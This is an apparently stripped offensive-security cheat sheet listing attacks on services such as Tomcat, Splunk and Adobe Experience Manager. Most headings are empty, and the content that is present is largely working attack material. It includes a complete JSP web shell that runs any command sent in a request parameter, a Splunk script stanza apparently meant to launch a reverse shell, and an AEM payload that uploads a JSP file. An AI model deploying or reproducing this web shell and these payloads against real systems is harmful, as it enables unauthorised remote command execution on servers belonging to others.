Attacking Services

The best methodology for pentesting services is to usually just search “Pentesting {service name}”

https://github.com/saisathvik1/OSCP-Cheatsheet?tab=readme-ov-file

Wordpress

WPScan

Misc

Github

Drupal

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Joomla

Tomcat

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Tomcat Common Gateway Interface (CGI)

Email

SNMP

MQTT

PHP

Splunk

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

PRTG Network Monitor

osTicket

ColdFusion

IIS Servers

AEM (Adobe Experience Manager)

Automated Tooling

High Value Endpoints

Common Misconfigs

Basic RCE upload via POST to /content/evil.jsp:

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

Admin RCE script available here: https://github.com/0ang3el/aem-hacker/blob/master/aem-rce-sling-script.sh, which uploads a malicious app

Grafana

Miscellaneous